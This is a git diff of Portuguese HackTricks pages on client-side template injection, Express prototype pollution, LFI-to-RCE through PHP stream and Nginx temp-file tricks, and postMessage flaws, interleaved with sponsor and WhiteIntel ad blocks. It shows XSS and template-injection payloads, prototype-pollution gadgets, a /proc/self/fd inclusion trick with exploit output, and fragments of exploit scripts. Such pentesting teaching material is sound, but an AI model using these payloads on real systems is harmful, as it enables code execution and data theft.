* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

34
pentesting-web/client-side-template-injection-csti.md
View file

@ -12,6 +12,19 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
# Resumo
@ -21,9 +34,9 @@ Outras maneiras de apoiar o HackTricks:
# AngularJS
AngularJS é um framework JavaScript amplamente utilizado que interage com o HTML por meio de atributos conhecidos como diretivas, sendo uma notável o **`ng-app`**. Essa diretiva permite que o AngularJS processe o conteúdo HTML, possibilitando a execução de expressões JavaScript dentro de chaves duplas.
AngularJS é um framework JavaScript amplamente utilizado que interage com HTML por meio de atributos conhecidos como diretivas, sendo uma notável o **`ng-app`**. Essa diretiva permite que o AngularJS processe o conteúdo HTML, possibilitando a execução de expressões JavaScript dentro de chaves duplas.
Em cenários onde a entrada do usuário é inserida dinamicamente no corpo HTML marcado com `ng-app`, é possível executar código JavaScript arbitrário. Isso pode ser alcançado aproveitando a sintaxe do AngularJS dentro da entrada. Abaixo estão exemplos que demonstram como o código JavaScript pode ser executado:
Em cenários onde a entrada do usuário é inserida dinamicamente no corpo HTML marcado com `ng-app`, é possível executar código JavaScript arbitrário. Isso pode ser alcançado aproveitando a sintaxe do AngularJS dentro da entrada. Abaixo estão exemplos demonstrando como o código JavaScript pode ser executado:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -40,7 +53,7 @@ Pode encontrar um exemplo online muito **básico da vulnerabilidade** no **Angul
# VueJS
Pode encontrar uma implementação **vulnerável do Vue** em [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Pode encontrar uma implementação **Vue vulnerável** em [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Payload funcional: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
E o **código fonte** do exemplo vulnerável aqui: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
@ -48,7 +61,7 @@ E o **código fonte** do exemplo vulnerável aqui: [https://github.com/azu/vue-c
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
Um post muito bom sobre CSTI em VUE pode ser encontrado em [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
Um post muito bom sobre CSTI no VUE pode ser encontrado em [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V3**
```
@ -86,6 +99,17 @@ javascript:alert(1)%252f%252f..%252fcss-images
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
@ -97,6 +121,6 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

57
pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
View file

@ -2,25 +2,39 @@
<details>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
- Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
---
## Servir respostas XSS
**Para mais detalhes [consulte a pesquisa original](https://portswigger.net/research/server-side-prototype-pollution)**
### Alterar o tipo de conteúdo JSON para HTML
Em um aplicativo Express usando uma **resposta de tipo de conteúdo JSON** e refletindo um JSON:
Em um aplicativo Express usando uma resposta de **tipo de conteúdo JSON** e refletindo um JSON:
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -54,11 +68,11 @@ Em seguida, um JSON refletido parecerá assim:
```
### Cabeçalhos Expostos
O seguinte gadget PP fará com que o servidor envie de volta o cabeçalho HTTP: **`Access-Control-Expose_headers: foo`**
O seguinte gadget de PP fará com que o servidor envie de volta o cabeçalho HTTP: **`Access-Control-Expose_headers: foo`**
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
É necessário ter o **módulo CORS instalado**
É necessário ter o módulo **CORS instalado**
### **Método OPTIONS**
@ -73,7 +87,7 @@ Com a carga útil a seguir, é possível **ocultar um método de uma resposta OP
```
### **Status**
É possível alterar o **código de status retornado** usando a seguinte carga útil PP:
É possível alterar o **código de status retornado** usando o seguinte payload PP:
```json
{"__proto__":{"status":510}}
```
@ -95,10 +109,12 @@ Além disso, em cenários onde uma biblioteca como o Lodash é empregada, defini
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
```
## Diversos
### Permitir Pontos
Existe uma opção no Express que permite **criar objetos a partir de parâmetros de string de consulta**.\
Você definitivamente poderia usá-lo em uma **cadeia** de bugs para explorar uma **vulnerabilidade de poluição de protótipo**.
Você definitivamente poderia usá-lo em uma **cadeia** de bugs para explorar uma vulnerabilidade de **poluição de protótipos**.
```json
{"__proto__":{"allowDots":true}}
```
@ -108,16 +124,29 @@ Você definitivamente poderia usá-lo em uma **cadeia** de bugs para explorar um
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O principal objetivo da WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

34
pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
View file

@ -8,10 +8,23 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## `compress.zlib://` e `PHP_STREAM_PREFER_STDIO`
@ -39,14 +52,25 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
O atacante fará o **servidor da vítima abrir uma conexão lendo um arquivo do servidor do atacante** usando o protocolo **`compress.zlib`**.
**Enquanto** essa **conexão** existir, o atacante irá **exfiltrar o caminho** para o arquivo temporário criado (é vazado pelo servidor).
**Enquanto** essa **conexão** existir, o atacante irá **extrair o caminho** para o arquivo temporário criado (é vazado pelo servidor).
**Enquanto** a **conexão** estiver aberta, o atacante irá **explorar um LFI carregando o arquivo temporário** que ele controla.
**Enquanto** a **conexão** estiver aberta, o atacante irá **explorar uma LFI carregando o arquivo temporário** que ele controla.
No entanto, há uma verificação no servidor web que **impede o carregamento de arquivos que contenham `<?`**. Portanto, o atacante irá abusar de uma **Condição de Corrida**. Na conexão que ainda está aberta, o **atacante** irá **enviar a carga útil PHP DEPOIS** do **servidor web** ter **verificado** se o arquivo contém os caracteres proibidos, mas **ANTES de carregar seu conteúdo**.
Para mais informações, consulte a descrição da Condição de Corrida e do CTF em [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O objetivo principal do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
@ -54,10 +78,10 @@ Para mais informações, consulte a descrição da Condição de Corrida e do CT
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

46
pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
View file

@ -6,20 +6,34 @@
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Configuração vulnerável
**[Exemplo de https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
* Código PHP:
```
````h`
<?php include_once($_GET['file']);
```
* Configuração do FPM / PHP:
@ -30,7 +44,7 @@ php_admin_value[file_uploads] = 0
...
```
* Configuração / fortalecimento:
```
```bash
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
@ -38,7 +52,7 @@ chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
```
Felizmente, o PHP é atualmente frequentemente implantado via PHP-FPM e Nginx. O Nginx oferece um recurso facilmente ignorado de [bufferização do corpo do cliente](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) que escreverá arquivos temporários se o corpo do cliente (não limitado a post) for maior que um determinado limite.
Este recurso permite que LFIs sejam explorados sem qualquer outra forma de criar arquivos, se o Nginx estiver sendo executado como o mesmo usuário que o PHP (muito comumente feito como www-data).
Esse recurso permite que LFIs sejam explorados sem nenhuma outra forma de criar arquivos, se o Nginx estiver sendo executado como o mesmo usuário que o PHP (comumente feito como www-data).
Código relevante do Nginx:
```c
@ -72,7 +86,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
Nota: Não é possível incluir diretamente `/proc/34/fd/15` neste exemplo, pois a função `include` do PHP resolveria o caminho para `/var/lib/nginx/body/0000001368 (deleted)`, que não existe no sistema de arquivos. Essa pequena restrição pode ser contornada por alguma indireção, como: `/proc/self/fd/34/../../../34/fd/15`, que finalmente executará o conteúdo do arquivo deletado `/var/lib/nginx/body/0000001368`.
Nota: Não é possível incluir diretamente `/proc/34/fd/15` neste exemplo, pois a função `include` do PHP resolveria o caminho para `/var/lib/nginx/body/0000001368 (deleted)`, que não existe no sistema de arquivos. Essa pequena restrição pode ser contornada por meio de alguma indireção, como: `/proc/self/fd/34/../../../34/fd/15`, que finalmente executará o conteúdo do arquivo deletado `/var/lib/nginx/body/0000001368`.
## Exploração Completa
```python
@ -169,9 +183,9 @@ $ ./pwn.py 127.0.0.1 1337
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Outro Exploit
### Outra Exploração
Isso está em [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
Isso é do [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
```python
import requests
import threading
@ -278,6 +292,18 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -285,9 +311,9 @@ read_file_multiprocess(requests_session, nginx_pids)
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Adquira o [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

90
pentesting-web/postmessage-vulnerabilities/README.md
View file

@ -4,21 +4,35 @@
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Enviar **PostMessage**
**PostMessage** usa a seguinte função para enviar uma mensagem:
O **PostMessage** usa a seguinte função para enviar uma mensagem:
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
@ -50,8 +64,8 @@ Se o **coringa** for usado, **mensagens podem ser enviadas para qualquer domíni
### Atacando iframe & coringa em **targetOrigin**
Conforme explicado neste [**relatório**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), se você encontrar uma página que pode ser **inserida em um iframe** (sem proteção de `X-Frame-Header`) e que está **enviando mensagens sensíveis** via **postMessage** usando um **coringa** (\*), você pode **modificar** a **origem** do **iframe** e **vazar** a **mensagem sensível** para um domínio controlado por você.\
Note que se a página puder ser inserida em um iframe, mas o **targetOrigin** estiver **definido como uma URL e não como um coringa**, esse **truque não funcionará**.
Conforme explicado em [**este relatório**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) se você encontrar uma página que pode ser **inserida em um iframe** (sem proteção de `X-Frame-Header`) e que está **enviando mensagens sensíveis** via **postMessage** usando um **coringa** (\*), você pode **modificar** a **origem** do **iframe** e **vazar** a **mensagem sensível** para um domínio controlado por você.\
Note que se a página pode ser inserida em um iframe, mas o **targetOrigin** está **definido para uma URL e não para um coringa**, esse **truque não funcionará**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -78,6 +92,8 @@ return;
// ...
}, false);
```
Observe neste caso como a **primeira coisa** que o código está fazendo é **verificar a origem**. Isso é terrivelmente **importante** principalmente se a página for fazer **qualquer coisa sensível** com as informações recebidas (como alterar uma senha). **Se não verificar a origem, os atacantes podem fazer as vítimas enviarem dados arbitrários para esses endpoints** e alterar as senhas das vítimas (neste exemplo).
### Enumeração
Para **encontrar ouvintes de eventos** na página atual, você pode:
@ -85,67 +101,63 @@ Para **encontrar ouvintes de eventos** na página atual, você pode:
* **Pesquisar** o código JS por `window.addEventListener` e `$(window).on` (_versão JQuery_)
* **Executar** no console das ferramentas de desenvolvedor: `getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1) (1).png>)
![](<../../.gitbook/assets/image (618) (1).png>)
* **Ir para** _Elementos --> Ouvintes de Eventos_ nas ferramentas de desenvolvedor do navegador
![](<../../.gitbook/assets/image (617).png>)
![](<../../.gitbook/assets/image (393).png>)
* Usar uma **extensão do navegador** como [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) ou [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Essas extensões do navegador irão **interceptar todas as mensagens** e mostrá-las para você.
### Contornos de verificação de origem
- O atributo **`event.isTrusted`** é considerado seguro, pois retorna `True` apenas para eventos gerados por ações genuínas do usuário. Embora seja desafiador de contornar se implementado corretamente, sua importância em verificações de segurança é notável.
- O uso de **`indexOf()`** para validação de origem em eventos PostMessage pode ser suscetível a contornos. Um exemplo ilustrando essa vulnerabilidade é:
* O atributo **`event.isTrusted`** é considerado seguro, pois retorna `True` apenas para eventos gerados por ações genuínas do usuário. Embora seja desafiador de contornar se implementado corretamente, sua importância em verificações de segurança é notável.
* O uso do método **`indexOf()`** para validação de origem em eventos PostMessage pode ser suscetível a contornos. Um exemplo ilustrando essa vulnerabilidade é:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- O método **`search()`** de `String.prototype.search()` é destinado a expressões regulares, não a strings. Passar qualquer coisa que não seja uma expressão regular leva à conversão implícita para regex, tornando o método potencialmente inseguro. Isso ocorre porque em regex, um ponto (.) age como um caractere curinga, permitindo contornar a validação com domínios especialmente elaborados. Por exemplo:
* O método **`search()`** de `String.prototype.search()` é destinado a expressões regulares, não a strings. Passar qualquer coisa que não seja uma expressão regular leva à conversão implícita em regex, tornando o método potencialmente inseguro. Isso ocorre porque em regex, um ponto (.) age como um caractere curinga, permitindo contornar a validação com domínios especialmente elaborados. Por exemplo:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
